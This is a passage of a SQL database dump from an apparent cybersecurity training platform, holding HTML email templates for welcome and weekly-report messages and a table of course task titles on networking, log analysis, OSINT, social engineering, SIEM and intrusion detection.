('weekly_report_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <div class=\\\"logo\\\">InfoSec<span>Labs</span></div> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Weekly Performance Report</h1> <p>Hello <strong>{{name}}</strong>,</p> <p>Here is your weekly activity summary and all-time performance stats.</p> <!-- This Week Section --> <div style=\\\"background-color: #131416; border: 1px solid #333; border-radius: 8px; padding: 20px; margin: 20px 0;\\\"> <p style=\\\"margin:0 0 15px 0; color:#b026ff; font-weight:bold; font-size:14px; text-transform:uppercase; letter-spacing:1px;\\\">📅 This Week</p> <div class=\\\"stat-row\\\"> <span class=\\\"stat-label\\\">Alerts Assigned</span> <span class=\\\"stat-value\\\">{{assigned}}</span> </div> <div class=\\\"stat-row\\\"> <span class=\\\"stat-label\\\">Investigations Closed</span> <span class=\\\"stat-value\\\">{{graded}}</span> </div> <div class=\\\"stat-row\\\"> <span class=\\\"stat-label\\\">Average Score</span> <span class=\\\"stat-value highlight\\\">{{avgScore}}%</span> </div> <div class=\\\"stat-row\\\" style=\\\"border-bottom: none; margin-bottom: 0px; padding-bottom: 0px;\\\"> <span class=\\\"stat-label\\\">XP Earned</span> <span class=\\\"stat-value\\\" style=\\\"color:#00ff41;\\\">+{{totalScore}}</span> </div> </div> <!-- All-Time Stats Section --> <div style=\\\"background-color: #131416; border: 1px solid #333; border-radius: 8px; padding: 20px; margin: 20px 0;\\\"> <p style=\\\"margin:0 0 15px 0; color:#00ff41; font-weight:bold; font-size:14px; text-transform:uppercase; letter-spacing:1px;\\\">🏆 All-Time Stats</p> <div class=\\\"stat-row\\\"> <span class=\\\"stat-label\\\">🔍 Total Investigations</span> <span class=\\\"stat-value\\\">{{totalInvestigations}}</span> </div> <div class=\\\"stat-row\\\"> <span class=\\\"stat-label\\\">⭐ Total XP</span> <span class=\\\"stat-value\\\" style=\\\"color:#00ff41;\\\">{{totalXP}}</span> </div> <div class=\\\"stat-row\\\"> <span class=\\\"stat-label\\\">📈 Lifetime Average</span> <span class=\\\"stat-value\\\">{{lifetimeAvg}}%</span> </div> <div class=\\\"stat-row\\\"> <span class=\\\"stat-label\\\">🎯 Best Score</span> <span class=\\\"stat-value\\\" style=\\\"color:#f59e0b;\\\">{{bestScore}}</span> </div> <div class=\\\"stat-row\\\" style=\\\"border-bottom: none; margin-bottom: 0px; padding-bottom: 0px;\\\"> <span class=\\\"stat-label\\\">🥇 Leaderboard Rank</span> <span class=\\\"stat-value\\\" style=\\\"color:#b026ff;\\\">#{{rank}}</span> </div> </div> <p>Keep investigating alerts to climb the leaderboard!</p> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{baseUrl}}/dashboard\\\" class=\\\"button\\\">Go to Dashboard</a> </div> <p style=\\\"font-size: 11px; color: #666; margin-top: 30px; text-align: center;\\\"> <a href=\\\"{{baseUrl}}/profile\\\" style=\\\"color: #666;\\\">Manage email preferences</a> </p> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-01-11 18:10:54'),
('weekly_report_subject', '\"Weekly Analyst Report\"', 'email_template', '2026-01-11 18:10:54'),
('welcome_email_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <div class=\\\"logo\\\">InfoSec<span>Labs</span></div> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Deployment Authorized</h1> <p>Analyst credentials active.</p> <p>Your objective is to investigate realistic cyber threats, analyze logs, and defend the network. Every correct verdict improves your rank on the global leaderboard.</p> <div class=\\\"card\\\" style=\\\"border-left-color: #00ff41;\\\"> <p style=\\\"margin:0; color:#00ff41; font-weight:bold;\\\">Mission Brief</p> <ul style=\\\"margin:10px 0 0 0; padding-left:20px; color:#ddd;\\\"> <li>Investigate Incidents</li> <li>Earn XP & Badges</li> <li>Competite with Top Analysts</li> </ul> </div> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{link}}\\\" class=\\\"button\\\">Access Dashboard</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-01-11 18:10:54'),
('welcome_email_subject', '\"Deployment Authorized: Welcome to InfoSecLabs\"', 'email_template', '2026-01-11 18:10:54');

-- --------------------------------------------------------

--
-- Table structure for table `tasks`
--

DROP TABLE IF EXISTS `tasks`;
CREATE TABLE `tasks` (
  `id` int(11) NOT NULL,
  `module_id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `description` text DEFAULT NULL,
  `task_type` enum('reading','challenge','quiz','alert_link','external_resource') DEFAULT 'reading',
  `task_data` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL CHECK (json_valid(`task_data`)),
  `xp_reward` int(11) DEFAULT 50,
  `display_order` int(11) DEFAULT 0,
  `is_active` tinyint(1) DEFAULT 1,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `alert_id` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `tasks`
--

INSERT INTO `tasks` (`id`, `module_id`, `title`, `description`, `task_type`, `task_data`, `xp_reward`, `display_order`, `is_active`, `created_at`, `updated_at`, `alert_id`) VALUES
(1, 1, 'What is Cybersecurity?', 'Read about cybersecurity fundamentals, the CIA Triad, and why security matters in the digital age.', 'reading', NULL, 20, 1, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(2, 1, 'Understanding Threats and Vulnerabilities', 'Learn the difference between threats, vulnerabilities, and risks. Explore common attack vectors.', 'reading', NULL, 30, 2, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(3, 1, 'Career Paths in Cybersecurity', 'Discover different career paths: SOC Analyst, Penetration Tester, Security Engineer, and more.', 'reading', NULL, 20, 3, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(4, 1, 'Quiz: Cybersecurity Basics', 'Test your knowledge of fundamental cybersecurity concepts.', 'quiz', NULL, 50, 4, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(5, 1, 'Setting Up Your Lab Environment', 'Install VirtualBox and download your first security-focused Linux distribution.', 'challenge', NULL, 100, 5, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(6, 2, 'Navigating the File System', 'Learn cd, ls, pwd commands. Practice moving through directories.', 'challenge', NULL, 40, 1, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(7, 2, 'File Manipulation', 'Master cp, mv, rm, mkdir, touch commands for managing files and directories.', 'challenge', NULL, 40, 2, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(8, 2, 'Understanding Permissions', 'Learn about user, group, and other permissions using chmod and chown.', 'reading', NULL, 50, 3, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(9, 2, 'Searching and Finding Files', 'Use find, locate, and which commands to search for files.', 'challenge', NULL, 40, 4, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(10, 2, 'Text Manipulation with grep', 'Learn to search file contents using grep with regular expressions.', 'challenge', NULL, 50, 5, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(11, 2, 'Process Management', 'Understand ps, top, kill commands for managing running processes.', 'challenge', NULL, 50, 6, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(12, 2, 'Package Management', 'Install and manage software using apt/yum package managers.', 'challenge', NULL, 40, 7, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(22, 4, 'OSI Model Explained', 'Learn the 7 layers of the OSI model and their functions.', 'reading', NULL, 40, 1, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(23, 4, 'TCP/IP Protocol Suite', 'Understand TCP vs UDP, common ports, and the three-way handshake.', 'reading', NULL, 50, 2, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(24, 4, 'IP Addressing and Subnetting', 'Learn IPv4 addressing, subnet masks, and CIDR notation.', 'challenge', NULL, 60, 3, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(25, 4, 'Subnetting Practice', 'Complete subnetting exercises to master network calculations.', 'challenge', NULL, 70, 4, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(26, 4, 'DNS Fundamentals', 'Understand how DNS works, record types (A, AAAA, MX, CNAME), and DNS queries.', 'reading', NULL, 50, 5, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(27, 4, 'DHCP and ARP', 'Learn how DHCP assigns IP addresses and how ARP maps IPs to MAC addresses.', 'reading', NULL, 40, 6, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(28, 4, 'Common Network Protocols', 'Explore HTTP/HTTPS, FTP, SSH, SMTP, and their security implications.', 'reading', NULL, 50, 7, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(30, 4, 'Network Traffic Analysis Challenge', 'Analyze a PCAP file to identify suspicious network activity.', 'challenge', NULL, 100, 9, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(31, 4, 'Quiz: Networking Essentials', 'Test your networking knowledge with a comprehensive quiz.', 'quiz', NULL, 60, 10, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
(32, 9, 'Windows File System', NULL, 'reading', NULL, 25, 1, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(33, 9, 'User Account Control', NULL, 'reading', NULL, 25, 2, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(34, 9, 'Windows Registry', NULL, 'reading', NULL, 25, 3, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(35, 9, 'Active Directory Intro', NULL, 'reading', NULL, 25, 4, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(36, 9, 'PowerShell Fundamentals', NULL, 'reading', NULL, 25, 5, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(37, 9, 'Windows Event Logs', NULL, 'reading', NULL, 25, 6, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(38, 9, 'Group Policy', NULL, 'reading', NULL, 25, 7, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(39, 9, 'Windows Security Tools', NULL, 'reading', NULL, 25, 8, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(40, 10, 'CIA Triad', NULL, 'reading', NULL, 25, 1, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(41, 10, 'Authentication Methods', NULL, 'reading', NULL, 25, 2, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(42, 10, 'Authorization', NULL, 'reading', NULL, 25, 3, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(43, 10, 'Accounting', NULL, 'reading', NULL, 25, 4, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(44, 10, 'Encryption Basics', NULL, 'reading', NULL, 25, 5, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(45, 10, 'Hashing vs Encryption', NULL, 'reading', NULL, 25, 6, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(46, 10, 'Defense in Depth', NULL, 'reading', NULL, 25, 7, 1, '2025-12-26 02:44:43', '2025-12-26 02:44:43', NULL),
(47, 10, 'Quiz: Security Principles', NULL, 'reading', NULL, 25, 8, 1, '2025-12-26 02:44:43', '2025-12-26 20:57:55', NULL),
(48, 11, 'Navigating Directories', NULL, 'reading', NULL, 25, 2, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(49, 11, 'Reading Files', NULL, 'reading', NULL, 25, 3, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(50, 11, 'Host Identity', NULL, 'reading', NULL, 25, 4, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(51, 11, 'IP Configuration', NULL, 'reading', NULL, 25, 5, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(52, 11, 'Terminating Processes', NULL, 'reading', NULL, 25, 6, 1, '2025-12-26 02:44:43', '2025-12-26 21:05:12', NULL),
(54, 12, 'Anatomy of a Log', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(55, 12, 'SSH Authentication', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(56, 12, 'Web Access Logs', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(57, 12, 'Windows Event Logs', NULL, 'reading', NULL, 30, 4, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(58, 12, 'Detecting Web Attacks', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(59, 12, 'Firewall & Network Logs', NULL, 'reading', NULL, 30, 6, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(60, 12, 'Command Injection', NULL, 'reading', NULL, 30, 7, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(61, 12, 'Advanced Obfuscation', NULL, 'reading', NULL, 30, 8, 1, '2025-12-26 02:44:43', '2025-12-26 21:08:58', NULL),
(72, 14, 'What is a Proxy?', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(73, 14, 'Burp Suite Basics', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(74, 14, 'Intercepting Requests', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(75, 14, 'Repeater & Decoder', NULL, 'reading', NULL, 30, 4, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(76, 14, 'Proxy Chaining & VPNs', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 21:17:42', NULL),
(77, 15, 'IDS vs IPS: Architecture', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(78, 15, 'Detection Methodologies', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(79, 15, 'Network (NIDS) vs Host (HIDS)', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(81, 15, 'Zeek (Bro) Surveillance', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(82, 15, 'Alert Triage & Investigation', NULL, 'reading', NULL, 30, 6, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(83, 15, 'Handling False Positives', NULL, 'reading', NULL, 30, 7, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(84, 16, 'The Vulnerability Lifecycle', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(85, 16, 'Authenticated vs Unauthenticated', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(86, 16, 'Decoding CVSS Scores', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(87, 16, 'Nessus Operations', NULL, 'reading', NULL, 30, 4, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(88, 16, 'Analyzing Scan Reports', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(89, 16, 'Patch Management Strategy', NULL, 'reading', NULL, 30, 6, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(90, 16, 'Understanding CVEs', NULL, 'reading', NULL, 30, 7, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(91, 16, 'Risk Response Strategies', NULL, 'reading', NULL, 30, 8, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(92, 17, 'DAST Fundamentals', NULL, 'reading', NULL, 30, 1, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(93, 17, 'OWASP Top 10 Deep Dive', NULL, 'reading', NULL, 30, 2, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(94, 17, 'OWASP ZAP Mastery', NULL, 'reading', NULL, 30, 3, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(95, 17, 'Advanced Spidering', NULL, 'reading', NULL, 30, 4, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(96, 17, 'Active Scanning Mechanics', NULL, 'reading', NULL, 30, 5, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(97, 17, ' Identifying DAST False Positives', NULL, 'reading', NULL, 30, 6, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(98, 17, 'Effective Remediation Reporting', NULL, 'reading', NULL, 30, 7, 1, '2025-12-26 02:44:43', '2025-12-26 22:03:21', NULL),
(160, 16, 'Module 16 Final Quiz', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:51:15', NULL),
(181, 18, 'What is OSINT?', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(182, 18, 'The Intelligence Cycle', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(183, 18, 'OPSEC & Sock Puppets', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(184, 18, 'Google Dorking Mastery', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(185, 18, 'People & Username Recon', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(186, 18, 'Email & Breach Data', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(187, 18, 'Image Intelligence (IMINT)', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(188, 18, 'Domain & Infrastructure', NULL, 'reading', NULL, 40, 8, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(189, 18, 'Geolocation & Maps', NULL, 'reading', NULL, 40, 9, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(190, 18, 'Module 18 Final Quiz', NULL, 'reading', NULL, 40, 10, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(191, 19, 'Email Anatomy: RFC 5322', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(192, 19, 'Authentication: SPF, DKIM, DMARC', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(193, 19, 'Investigation 1: The CEO Fraud', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(194, 19, 'Investigation 2: Malicious Attachment', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(195, 19, 'Investigation 3: The Credential Harvest', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(196, 19, 'Module 19 Final Quiz', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:20:34', NULL),
(201, 20, 'Psychology of Persuasion', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(202, 20, 'Pretexting & Impersonation', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(203, 20, 'Vishing (Voice Phishing)', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(204, 20, 'Smishing (SMS Phishing)', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(205, 20, 'Physical: Tailgating & Dumpster Diving', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(206, 20, 'Baiting & Quid Pro Quo', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(207, 20, 'Module 20 Final Quiz', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:46', '2025-12-26 22:29:54', NULL),
(211, 21, 'Introduction to Virtualization', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(212, 21, 'Hypervisors: Type 1 vs Type 2', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(213, 21, 'Setting Up VirtualBox (Free)', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(214, 21, 'Setting Up VMware Workstation', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(215, 21, 'Creating Your First VM (Kali Linux)', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(216, 21, 'Network Modes: NAT, Bridged, Host-Only', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(217, 21, 'Snapshots & Clones (The Safety Net)', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:46', '2025-12-26 22:33:02', NULL),
(221, 22, 'What is a SIEM?', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(222, 22, 'Log Sources & Ingestion', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(223, 22, 'Normalization & Parsing', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(224, 22, 'Correlation Rules (The Magic)', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(225, 22, 'Market Leaders: Splunk vs Sentinel', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(226, 22, 'Open Source: The ELK Stack', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(227, 22, 'Wazuh: The Modern Open SIEM', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:46', '2025-12-26 22:37:10', NULL),
(228, 22, 'Final Quiz', NULL, 'reading', NULL, 40, 8, 1, '2025-12-26 02:45:46', '2025-12-26 22:38:12', NULL),
(231, 23, 'Use Case 1: Brute Force Attack (Easy)', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(232, 23, 'Use Case 2: Malware Beaconing (Easy)', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(233, 23, 'Use Case 3: Impossible Travel (Medium)', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(234, 23, 'Use Case 4: Privilege Escalation (Medium)', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(235, 23, 'Use Case 5: DNS Tunneling (Hard)', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:46', '2025-12-26 22:43:08', NULL),
(236, 23, 'Final Quiz', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:47', '2025-12-26 22:43:08', NULL),
(241, 24, 'What is EDR?', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(242, 24, 'EDR vs Antivirus', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(243, 24, 'The Process Tree (Deep Dive)', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(244, 24, 'Reading Process Ancestry', NULL, 'reading', NULL, 40, 4, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(245, 24, 'Suspicious Parent-Child Relationships', NULL, 'reading', NULL, 40, 5, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(246, 24, 'EDR Market Leaders', NULL, 'reading', NULL, 40, 6, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(247, 24, 'Final Quiz', NULL, 'reading', NULL, 40, 7, 1, '2025-12-26 02:45:47', '2025-12-26 22:47:36', NULL),
(251, 25, 'IDS Types: NIDS vs HIDS', NULL, 'reading', NULL, 40, 1, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(252, 25, 'Signature vs Anomaly Detection', NULL, 'reading', NULL, 40, 2, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(253, 25, 'Snort: The Open-Source IDS', NULL, 'reading', NULL, 40, 3, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(254, 25, 'Suricata: The Modern Alternative', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(255, 25, 'Analyzing IDS Alerts', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
(256, 25, 'Final Quiz', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 22:51:25', NULL),
